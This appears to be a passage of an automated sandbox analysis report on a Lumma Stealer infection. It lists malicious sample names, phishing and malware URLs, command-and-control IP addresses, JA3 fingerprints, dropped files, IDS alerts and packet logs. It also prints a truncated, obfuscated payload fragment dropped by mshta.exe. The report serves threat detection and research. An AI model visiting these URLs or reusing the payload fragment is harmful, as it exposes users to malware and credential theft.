	https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvV	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	https://shibe-rium.net/	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse
	Fatura227Pendente576.pdf674.msi	Get hash	malicious	Unknown	Browse
	https://logistics.sheincorp.cn/#/login	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
172.67.223.7	h8lD4SWL35.exe	Get hash	malicious	FormBook	Browse	www.worldsourcecloud.com/nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4
172.67.223.7	Nz7NA3F7z7.exe	Get hash	malicious	FormBook	Browse	www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.63.229
	LightSpoofer.exe	Get hash	malicious	Unknown	Browse	104.26.9.59
	Solara-3.0.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.21.67.146
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.67.146
	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	104.21.16.1
	https://shibe-rium.net/	Get hash	malicious	Unknown	Browse	104.18.18.237
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.197.170
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.63.229
	LightSpoofer.exe	Get hash	malicious	Unknown	Browse	104.26.9.59
	Solara-3.0.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.21.67.146
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.67.146
	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	104.21.16.1
	https://shibe-rium.net/	Get hash	malicious	Unknown	Browse	104.18.18.237
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.197.170
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.63.229
	LightSpoofer.exe	Get hash	malicious	Unknown	Browse	104.26.9.59
	Solara-3.0.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.21.67.146
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.67.146
	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	104.21.16.1
	https://shibe-rium.net/	Get hash	malicious	Unknown	Browse	104.18.18.237
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.197.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	104.21.37.173
	Company Information.pdf.lnk	Get hash	malicious	Unknown	Browse	104.21.37.173
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.37.173
	Fatura227Pendente576.pdf674.msi	Get hash	malicious	Unknown	Browse	104.21.37.173
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.37.173
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	104.21.37.173
	B06 Chair + Blocker.exe	Get hash	malicious	Unknown	Browse	104.21.37.173
	B06 Chair + Blocker.exe	Get hash	malicious	Unknown	Browse	104.21.37.173
a0e9f5d64349fb13191bc781f81f42e1	Solara-3.0.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.21.96.1
	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	104.21.96.1
	Navan - Itinerary.pdf.scr.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	BigProject.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	jqplot.hta	Get hash	malicious	Unknown	Browse	104.21.96.1
37f463bf4616ecd445d4a1937da06e19	LightSpoofer.exe	Get hash	malicious	Unknown	Browse	172.67.223.7
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	172.67.223.7
	Rechnung736258.pdf.lnk	Get hash	malicious	LummaC	Browse	172.67.223.7
	Company Information.pdf.lnk	Get hash	malicious	Unknown	Browse	172.67.223.7
	Navan - Itinerary.pdf.scr.exe	Get hash	malicious	LummaC	Browse	172.67.223.7
	BigProject.exe	Get hash	malicious	LummaC	Browse	172.67.223.7
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.223.7
	jqplot.hta	Get hash	malicious	Unknown	Browse	172.67.223.7

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	642968
Entropy (8bit):	6.145372514924513
Encrypted:	false
SSDEEP:	6144:5/SWP1PkrKeNSuBev+ezCCsese4tAeLkepSBIkYMJMelek2efeFOelI/:5PPBM2
MD5:	543530C3B4038086637ACCF9D95397D6
SHA1:	617115DDA0F8553D7DD5CEE8D0DC2DDEC461C59C
SHA-256:	D070FAD55BE0D3269DBEBB1DE70652D82D48F0AD849F960D27D3E71018EB208C
SHA-512:	45F190D4ADE1A1AF105F93566CFE34285A47FC9A1E2124C7B9EC787A262F8085A8A3659276A2A0A8DBD4243602AF41A6AA89E77ADE405FB4DF5A2A6865D56DB2
Malicious:	false
Preview:	66D75V6ed63S74T69B6fN6ev20D4eO57j6aZ4eK28h65L4fz46a5ad64s29I7bS76n61r72n20y66g6cp6dM4fp3dy20t27y27A3be66f6fs72B20S28S76N61D72d20I52l59v4co41u20r3dR20G30o3bS52j59E4ca41P20e3cp20U65m4fL46B5aG64E2eV6ck65Z6eg67B74T68y3bH20K52e59E4cp41f2bF2bs29J7bl76x61u72i20K47a4fP77w62D4dP73O20L3dx20f53B74C72W69D6eQ67K2eP66O72p6fy6dI43g68H61E72z43k6fk64Y65x28L65B4fO46H5aY64u5bu52V59c4cc41m5dF20m2dK20e33d38C33T29c3bp66h6ct6dX4fH20v3da20d66S6cK6dw4fT20f2bp20O47m4fe77m62u4dy73I7dV72o65n74l75D72t6eW20W66d6ca6dw4fR7dH3bj76P61S72d20G66L6cy6dQ4fb20L3dg20J4eG57P6aX4eX28z5br34H39U35T2cT34s39G34m2cD35B30D32H2cp34j38z34B2cY34F39y37U2cB34f39j38A2cs34u38d37H2cc34x38e34y2cy34d39j31p2cw34o39Q31X2cL34r32D39J2cu34J38m34b2cg35H30i33K2cZ34D38y34L2cY34U31b35Y2cO34z32K38G2cX35F30I32L2cA34K31F35k2co34b33I32K2cc34Z31G35i2cH34C32a38U2cO34T38Y34v2cf34Y39Q35b2cM34r31I35M2ch34w36l38o2cA34a39a33V2cC34y39V37y2cu34n38i34y2cO34s39R38M2cY34p39r39D2cg34M39g37c2cu34d38X38x2cS34v38c32g2cn34R39i39h2cb34F38S34Q2cy34a38A33r2cp34R31M35T2ca34w3

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ib0jx4n.dxz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj3jmtjd.muo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0gauejz.kyd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (9542)
Category:	downloaded
Size (bytes):	9547
Entropy (8bit):	5.777233050028666
Encrypted:	false
SSDEEP:	192:0pN6666xgjH3a95WZ6US4YN7iv5gOiV9kmSCP1UugaNnH2MU1RHd/X:0j6666AXa/WZkWlGqC6uLHbU1xB
MD5:	DAA95E66C0E604EF9A0AEC3ABF47ADB0
SHA1:	25E2B365415FCC4DB0CBCC6F100D2695D7B8EFC8
SHA-256:	DCF4DE7A03136E485D72A6F993C0A7FD1B0DE082079ADCA65C5BB67F03596649
SHA-512:	2392BE8F84CE6A662B65A1C4D8F15BECDDAAC61A33DD5A04025FC00FD8D3491083EEC50E6E3B74BC8DDAA545C59C2DB8CD5CA346025C11A71A0380DB1C42E324
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["tf2 comics","one piece chapter 1134 spoilers reddit","women volleyball championship","women volleyball championship","dow jones stock markets","dallas mavericks","google pixel 9 pro","nuna baby essentials car seat recall"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CgsvZy8xMjF4a2RkaxINU3BvcnRzIGxlYWd1ZTKzBmRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBQlFBUUFNQklnQUNFUUVERVFIL3hBQVpBQUVCQUFNQkFBQUFBQUFBQUFBQUFBQUFCUUlEQkFmL3hBQXNFQUFCQXdJRUJBVUZBUUFBQUFBQUFBQUJBZ01SQUFRRkVpRXhCaE5CVVNKaGdhSHdGREpDa2RFai84UUFGUUVCQVFBQUFBQUFBQUFBQUFBQUFBQ

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T21:06:21.265075+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49756	104.21.96.1	443	TCP
2024-12-21T21:06:22.231879+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49756	104.21.96.1	443	TCP
2024-12-21T21:06:22.231879+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49756	104.21.96.1	443	TCP
2024-12-21T21:06:23.516539+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49757	104.21.96.1	443	TCP
2024-12-21T21:06:24.218240+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49757	104.21.96.1	443	TCP
2024-12-21T21:06:24.218240+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49757	104.21.96.1	443	TCP
2024-12-21T21:06:32.527624+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49770	104.21.96.1	443	TCP
2024-12-21T21:06:33.658430+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49771	104.21.96.1	443	TCP
2024-12-21T21:06:34.588053+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49772	104.21.96.1	443	TCP
2024-12-21T21:06:35.902005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49773	104.21.96.1	443	TCP
2024-12-21T21:06:37.227791+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49774	104.21.96.1	443	TCP
2024-12-21T21:06:37.733511+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.11.20	49774	104.21.96.1	443	TCP
2024-12-21T21:06:38.353632+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49775	104.21.96.1	443	TCP
2024-12-21T21:06:42.569447+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49776	104.21.96.1	443	TCP
2024-12-21T21:06:50.415838+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49776	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 21:04:39.086321115 CET	49697	443	192.168.11.20	23.50.112.50
Dec 21, 2024 21:04:39.086321115 CET	49690	80	192.168.11.20	192.229.211.108
Dec 21, 2024 21:04:39.720881939 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:39.720901966 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:39.721213102 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:39.733329058 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:39.733341932 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.005780935 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.006059885 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.051956892 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.052004099 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.052650928 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.053463936 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.055835962 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.084857941 CET	49684	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.098212957 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.162256002 CET	49685	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.209147930 CET	49683	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.209158897 CET	49687	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.209182978 CET	49682	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.318855047 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319048882 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319103956 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319114923 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319135904 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319204092 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319310904 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319330931 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319477081 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319477081 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319489956 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319557905 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319740057 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319751978 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.319776058 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319962978 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.319994926 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.320009947 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.320180893 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.320475101 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.320544958 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.320581913 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.320713997 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.320730925 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.320892096 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.321101904 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.321850061 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322125912 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322227001 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.322244883 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322418928 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.322562933 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322583914 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.322596073 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322799921 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322817087 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.322825909 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.322998047 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.323211908 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.323231936 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323446989 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323456049 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.323466063 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323683023 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323718071 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323755980 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.323755980 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.323770046 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.323930025 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.324136972 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.324270010 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.324470997 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.324708939 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.324708939 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.324714899 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.324728966 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.325087070 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.325098991 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.325340033 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.325486898 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.325687885 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.325700998 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.325747967 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.325943947 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.325956106 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.326154947 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.326236963 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.326562881 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.326581955 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.326708078 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.327095985 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.327107906 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.327301025 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.412240982 CET	49681	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.448504925 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.448725939 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.448903084 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.449506998 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.449726105 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.449779987 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.449970007 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.450462103 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.450701952 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.450722933 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.451071978 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.451277971 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.451354027 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.451749086 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.451977015 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.452275991 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.452557087 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.452629089 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.452929020 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.452929020 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.453253031 CET	443	49754	172.67.223.7	192.168.11.20
